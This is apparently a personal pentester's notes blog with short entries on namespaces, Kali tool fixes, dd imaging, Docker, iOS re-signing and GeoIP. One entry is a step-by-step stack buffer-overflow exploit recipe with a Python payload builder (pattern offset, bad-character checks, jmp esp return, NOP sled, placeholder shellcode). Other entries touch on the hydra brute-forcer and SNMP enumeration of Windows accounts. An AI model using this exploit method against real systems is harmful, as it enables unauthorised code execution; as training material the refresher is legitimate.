Tuesday, June 18, 2019

Namespace of processes


Check the namespace IDs of a process. Each entry is a symlink to "type:[inode]"; two processes with the same inode for a type share that namespace, so comparing the links quickly shows whether, say, their uts namespaces collide.

$ ls -lash /proc/self/ns
total 0
0 dr-x--x--x. 2  0 Jun 19 01:11 .
0 dr-xr-xr-x. 9  0 Jun 19 01:11 ..
0 lrwxrwxrwx. 1  0 Jun 19 01:11 cgroup -> 'cgroup:[4026531835]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 ipc -> 'ipc:[4026531839]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 mnt -> 'mnt:[4026531840]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 net -> 'net:[4026531992]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 pid -> 'pid:[4026531836]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 pid_for_children -> 'pid:[4026531836]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 user -> 'user:[4026531837]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 uts -> 'uts:[4026531838]'

pidof [prog]
ls -lash /proc/[pid]/ns
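Doing the same comparison in code, as an added example that is not part of the original post: it reads the /proc/<pid>/ns links the way ls does, answers "do these two PIDs share a namespace" and groups every process on the box by namespace inode, which is the quick way to spot a container that landed in the host's uts or net namespace. The proc root is a parameter so the scan also works against a copied proc tree (or, in a test, a constructed one); reading another user's links needs the same permission as ptrace, so unreadable processes are simply skipped.

```python
import os
import re
from collections import defaultdict

# Namespace types exposed under /proc/<pid>/ns; pid_for_children is a view of pid and is skipped.
NS_TYPES = ("cgroup", "ipc", "mnt", "net", "pid", "user", "uts")


def namespace_ids(pid, proc="/proc"):
    """Return {ns_type: 'type:[inode]'} for one process, exactly what `ls -l /proc/<pid>/ns` shows.
    `proc` defaults to the live procfs; pass another root to scan a copied tree."""
    ns_dir = os.path.join(proc, str(pid), "ns")
    ids = {}
    for ns in NS_TYPES:
        try:
            ids[ns] = os.readlink(os.path.join(ns_dir, ns))
        except OSError:
            # EACCES (no PTRACE_MODE_READ on that process), ENOENT (old kernel without this
            # namespace type) or the process exited mid-scan: leave the type out.
            continue
    return ids


def inode(nsid):
    """'uts:[4026531838]' -> 4026531838"""
    m = re.fullmatch(r"\w+:\[(\d+)\]", nsid)
    if not m:
        raise ValueError("not a namespace link target: %r" % nsid)
    return int(m.group(1))


def same_namespace(pid_a, pid_b, ns, proc="/proc"):
    """True when both processes resolve to the same namespace inode for `ns`.
    Unreadable or missing entries count as 'not the same' rather than raising."""
    a = namespace_ids(pid_a, proc).get(ns)
    b = namespace_ids(pid_b, proc).get(ns)
    return a is not None and a == b


def group_by_namespace(ns, proc="/proc"):
    """Map each 'type:[inode]' seen under `proc` to the list of PIDs living in it.
    A second key besides the host's means a separate namespace exists; a PID you expected to be
    isolated showing up under the host's inode means the isolation is not there."""
    groups = defaultdict(list)
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        nsid = namespace_ids(int(entry), proc).get(ns)
        if nsid:
            groups[nsid].append(int(entry))
    return dict(groups)


if __name__ == "__main__":
    print(namespace_ids(os.getpid()))
    for nsid, pids in sorted(group_by_namespace("uts").items()):
        print("%s  %d processes (e.g. pid %d)" % (nsid, len(pids), min(pids)))
```

Run it as root to see every process; as an ordinary user you only get your own processes and the host-wide count is an undercount, not a sign that the other namespaces are empty.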

Friday, November 6, 2015

thc-hydra

[VERBOSE] Could not create an SSL session: error:14077102:SSL routines:SSL23_GET_SERVER_HELLO:unsupported protocol

The default thc-hydra package on Kali at the time of this post was not compiled with SSL support. Download the thc-hydra source and build it yourself (with the OpenSSL development headers installed so ./configure picks them up) to get SSL targets working.

Thursday, October 29, 2015

Kali - peepingtom + capture.js + phantomjs problems

At the time of this post, I experienced the following problems getting peepingtom and phantom.js up and running:

Step 1:
Compile phantomjs from source. If the ./build.sh script fails with out-of-memory errors, increase your swap space; follow the directions in this DigitalOcean guide:

https://www.digitalocean.com/community/tutorials/how-to-add-swap-on-ubuntu-14-04


Step 2:
Copy the built binary to /usr/bin/phantomjs

Step 3:
Modify capture.js to the following. PhantomJS 2 removed phantom.args, so the URL and output filename are read from require('system').args instead; the status check stays commented out so a screenshot is still written when the page reports a failed load:


var page = require('webpage').create(),
    url, filename, size;

// PhantomJS 2 dropped phantom.args; system.args[0] is the script itself,
// so the URL and output file are args[1] and args[2].
var args = require('system').args;
url = args[1];
filename = args[2];
// url = phantom.args[0];
// filename = phantom.args[1];
page.viewportSize = { width: 800, height: 600 };
page.clipRect = { top: 0, left: 0, width: 800, height: 600 };
page.open(url, function (status) {
    // Status check intentionally disabled: render whatever loaded, even on failure.
    //if (status !== 'success') {
    //    console.log('Unable to load the address!');
    //} else {
        window.setTimeout(function () {
            page.render(filename);
            phantom.exit();
        }, 200);
    //}
});

Wednesday, July 22, 2015

Windows Infections without tools

http://909research.com/find-a-windows-infection-quickly-without-tools/

Tuesday, July 21, 2015

VirtualBox Ubuntu stuck on 640x480

sudo apt-get install virtualbox-guest-dkms

dd

sudo dd if=/dev/sdc conv=sync,noerror of=/home/backup.img bs=64K

noerror keeps dd reading past unreadable sectors instead of aborting, and sync pads each short read out to the full block size with zeros so everything after a bad sector stays at the right offset in the image. You will also need to use those options for the restore. Double-check the target device before running it: dd overwrites it without asking, and the restore below writes to /dev/sdb, not the /dev/sdc the image was taken from.

sudo dd if=/home/backup.img of=/dev/sdb conv=sync,noerror bs=64K

Wednesday, July 8, 2015

Start another shell session on same container in Docker

docker exec -it <container id or name> bash

The id or name comes from docker ps; the new shell runs in the container's namespaces with the container's user, alongside the existing session.

Thursday, July 2, 2015

Interactive Regex tester

https://regex101.com/#python

OSX FW Config

https://discussions.apple.com/thread/6645172

Refresher buffer overflow

1.  Fuzz the target input until it crashes.
2.  Attach Immunity Debugger to the target.
3.  Confirm that the crash overwrites the EIP register (e.g. EIP = 41414141 after sending a buffer of "A"s).
4.  Generate a unique pattern of the crashing length with /usr/share/metasploit-framework/tools/pattern_create.rb [length] and send it instead.
5.  Note the value in the EIP register at the crash.
6.  Feed that value to /usr/share/metasploit-framework/tools/pattern_offset.rb [value] to get the offset of EIP within the buffer.
7.  Use this offset as the new base length: that many bytes of junk, then the 4 bytes that land in EIP.
8.  Find out which characters are bad for the payload (typically \x00, often \x0a and \x0d) by sending \x01..\xff after the overwrite and checking in the debugger which bytes are mangled on the stack.
9.  Run !mona modules in Immunity Debugger to list the loaded modules. Pick one without protections (Rebase, SafeSEH, ASLR and NXCompat all False) whose address range contains no bad characters (e.g. no null bytes).
10. Find a jmp esp instruction to use:
10.a  Use /usr/share/metasploit-framework/tools/nasm_shell.rb to get the opcode for jmp esp:
nasm > jmp esp
00000000  FFE4              jmp esp

11.  Search for that opcode in the chosen module with mona:  !mona find -s "\xff\xe4" -m slmfc.dll

12.  Pick an address whose bytes contain no bad characters, and double-check the contents at that address by double-clicking it.
13.  Put that address, little-endian, in the 4 bytes that overwrite EIP.
14.  To validate, set a breakpoint at the jmp esp address and run the exploit again to make sure it is hit.

15.  Place the shellcode (after a short NOP sled) right after the EIP overwrite, where ESP points, so jmp esp lands in it.
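The tool-side half of that refresher in one script, as an added example that is not part of the original post: it rebuilds what pattern_create.rb and pattern_offset.rb do (same Aa0Aa1... layout, so the EIP value from the debugger gives the same offset either way), produces the \x01..\xff bad-character probe for step 8, checks the jmp esp address and the shellcode against the bad characters, and assembles junk + address + NOP sled + shellcode for step 15. The jmp esp address 0x5f4a358f and the 0xcc shellcode in the walk-through are constructed placeholders, not values from slmfc.dll or from the post.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes before the pattern repeats


def pattern_create(length):
    """Cyclic pattern with the same layout as pattern_create.rb (Aa0Aa1Aa2...Ab0...).
    Every 4-byte window is unique, so the dword that lands in EIP identifies its offset."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_PATTERN)
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip, length=MAX_PATTERN):
    """Offset of the crashed EIP value within the pattern, like pattern_offset.rb.
    `eip` is either the 4 pattern characters as seen in the stack window ("Aa5A") or the
    register value as 8 hex digits ("41356141" / "0x41356141"). x86 is little-endian, so a
    hex value is reversed into memory order before searching. Returns -1 if not found."""
    value = eip[2:] if eip.lower().startswith("0x") else eip
    if len(value) == 8 and all(c in "0123456789abcdefABCDEF" for c in value):
        needle = bytes.fromhex(value)[::-1].decode("ascii")
    else:
        needle = eip
    return pattern_create(length).find(needle)


def badchar_probe(badchars=b"\x00"):
    """Every byte 0x01..0xff except the ones already known to be bad. Send this after the
    overwrite and compare it against the stack in the debugger to find further mangled bytes."""
    return bytes(b for b in range(1, 256) if b not in badchars)


def find_badchars(data, badchars):
    """Return the bad byte values that occur in `data` (an empty list means it is clean)."""
    return [b for b in badchars if b in data]


def build_payload(offset, jmp_esp_addr, shellcode, badchars=b"\x00", nop_sled=16):
    """junk[offset] + address of jmp esp (little-endian) + NOP sled + shellcode.
    After the overwritten return, ESP points just past the saved EIP, so jmp esp lands in
    the sled. Refuses to build if the address or the shellcode contains a bad character."""
    ret = struct.pack("<I", jmp_esp_addr)
    for name, blob in (("jmp esp address", ret), ("shellcode", shellcode)):
        bad = find_badchars(blob, badchars)
        if bad:
            raise ValueError("%s contains bad chars: %s" % (name, ["0x%02x" % b for b in bad]))
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    # Walk-through with constructed values; the real ones come from the debugger.
    print(pattern_create(20))              # Aa0Aa1Aa2Aa3Aa4Aa5Aa
    print(pattern_offset("41356141"))      # 15: EIP held "Aa5A" in memory order
    # 0x5f4a358f is a hypothetical jmp esp address (placeholder, not from the page).
    print(build_payload(15, 0x5f4a358f, b"\xcc" * 4).hex())
```

Feed pattern_offset the register value exactly as Immunity shows it; an 8-hex-digit string is treated as the register value, anything else as literal pattern characters.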

Tuesday, June 23, 2015

Common Microsoft Windows SNMP parameters

OIDs worth walking on a Windows host (HOST-RESOURCES-MIB, Microsoft's LanMgr MIB and TCP-MIB):

OID                        MIB object                 Meaning
1.3.6.1.2.1.25.1.6.0       hrSystemProcesses          System processes (count)
1.3.6.1.2.1.25.4.2.1.2     hrSWRunName                Running programs
1.3.6.1.2.1.25.4.2.1.4     hrSWRunPath                Process paths
1.3.6.1.2.1.25.2.3.1.4     hrStorageAllocationUnits   Storage units
1.3.6.1.2.1.25.6.3.1.2     hrSWInstalledName          Installed software names
1.3.6.1.4.1.77.1.2.25      svUserTable                User accounts
1.3.6.1.2.1.6.13.1.3       tcpConnLocalPort           TCP local ports

Monday, September 22, 2014

Manual install of apps on iPhone 6 simulator

Source:
https://forums.adobe.com/thread/1571152

Well, I'll describe what I did, but I don't know why exactly it works like this, nor can I guarantee it will work for you 
1. Install a native app on the simulator of choice (e.g. iPhone 6+) with Xcode 6.
2. Build an ipa file for the simulator with Flash (this crashes Flash for me, but it builds the ipa before crashing), and unzip it so you can access the .app file in it.
3. Locate the directory of the simulator you want to use. In ~/Library/Developer/CoreSimulator/Devices you will find several folders (with names that look like hexadecimal), each with a simulator. Check the device.plist file in each to find the simulator you want. The one for iPhone 6+ contains the string "com.apple.CoreSimulator.SimDeviceType.iPhone-6-Plus".
4. In that folder, go to data/Containers/Bundle/Application, where you should see another folder with a hexadecimal name, containing the .app file of the native app installed in step 1.
5. Next to that folder, create a new folder for your app. I named that folder after the app bundle ID. Copy your .app file from step 2 into that new folder.
6. In the folder of the native app (step 4), open the hidden file named .com.apple.mobile_container_manager.metadata.plist and change the string under MCMMetadataIdentifier into your app's bundle ID. I didn't change the other stuff in there as I don't know what it means. Save this changed file into the newly created folder next to your .app file.
7. Open the simulator (located at /Applications/Xcode.app/Contents/Applications) and in it the chosen device in the hardware menu. On the 2nd page you should hopefully see your app icon. If not, then it means that one of the many other things I tinkered with had an effect as well...

Thursday, July 17, 2014

Passing parameters to javascript action methods

http://stackoverflow.com/questions/8442552/passing-parameters-to-a-jquery-function-from-a-button-click


Wednesday, July 9, 2014

Re-codesign iPhone apps (.ipa files) with Enterprise Certificates

http://avinashdongarwar.blogspot.com/2013/12/re-codesign-iphone-apps-ipa-files-with.html

Pre-Requisites

1)   Download the distribution certificate from iOS Developer Enterprise Program account. Include it in keychain by double clicking on downloaded .cer file. 
2)   Download the provisioning profile for the app that needs to be resigned from  iOS Developer Enterprise Program Account.
3)   Have the .ipa file of the app that needs to be resigned.

How to Re-sign -
Let's say Application.ipa is the one we are re-signing.
Open a terminal and:
1)  Unzip the .ipa file.
unzip Application.ipa 
2)  At this stage you will have a directory named “Payload” in your working directory, containing a file with the .app extension. In this case it will be Application.app.
3)  In case you want to check the signing authority of the app -
 codesign -dvv Payload/Application.app
4)  Remove old code signature.
rm -r "Payload/Application.app/_CodeSignature" "Payload/Application.app/CodeResources" 2> /dev/null || true
5)   If the bundle identifier registered for the app when the provisioning profile was created through the Enterprise account differs from the one the app was originally signed with, change the bundle identifier with PlistBuddy.
/usr/libexec/PlistBuddy Payload/Application.app/Info.plist
Use following commands -
a)  Set :CFBundleIdentifier
b)  Save
c)  Quit
6)  If the app uses OS capabilities such as a shared keychain, SSO or push notifications, the resigned app has to carry matching entitlements, so pass an entitlements property list when resigning (otherwise those capabilities are lost or the app fails to launch). The app's current entitlements can be dumped to a new file with:
     /usr/bin/codesign -d --entitlements :entitlements.plist Payload/Application.app
7)  Open the entitlements.plist and edit it.
a) vi entitlements.plist
b) Press i.
c) entitlements.plist looks like this (get-task-allow is false for a distribution build):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
        <key>application-identifier</key>
        <string>XXXXXXXX.</string>
        <key>get-task-allow</key>
        <false/>
        <key>keychain-access-groups</key>
        <array>
                <string>XXXXXXXX.</string>
                <string>XXXXXXXX.< keychain group id></string>
                …………..etc………..
        </array>
</dict>
</plist>

In the above chunk, XXXXXXXX part has to be replaced with team ID of the Enterprise Account.
d)  Press esc
e)  :wq!
8) Replace embedded provisioning profile.
cp "<path to the downloaded .mobileprovision from the prerequisites>" "Payload/Application.app/embedded.mobileprovision"
9) Re-sign, passing the name of the enterprise distribution identity to -s:

 /usr/bin/codesign -f -s "iPhone Distribution: <your enterprise team name>" --resource-rules "Payload/Application.app/ResourceRules.plist" --entitlements entitlements.plist "Payload/Application.app"

The exact identity name can be checked in the Keychain Access utility on a Mac: open Keychain Access and search for "iPhone Distribution". Newer versions of codesign no longer accept --resource-rules (Apple dropped support for custom resource rules); on those, omit that option and let codesign seal the bundle with its default rules.
  
10) Repackage
    zip -qr "Application.resigned.ipa" Payload

Wednesday, July 2, 2014

Resigning an application

http://avinashdongarwar.blogspot.com/2013/12/re-codesign-iphone-apps-ipa-files-with.html

Friday, June 6, 2014

Crashing avd emulator

http://timvoet.com/2013/01/04/avd-emulator-crashes-on-mac/

Wednesday, April 23, 2014

Enable syslog server on Mavericks

http://stackoverflow.com/questions/5510563/how-to-start-syslogd-server-on-mac-to-accept-remote-logging-messages

Tuesday, April 22, 2014

Installing geoip to mavericks

http://www.krishnasunuwar.com.np/2014/02/installation-maxmind-geoip-python-library-in-os-x-10-9-mavericks/

Steps to installing GeoIP for Django

1.  Install the C library (libGeoIP).
2.  Download the binary database and put it in the share folder the C library looks in.
3.  Install the Python binding, GeoIP 1.3.1 (pip install geoip).
4.  Configure Django settings.py: add 'django.contrib.gis' to INSTALLED_APPS and point GEOIP_PATH at the directory holding the database.
    'django.contrib.gis',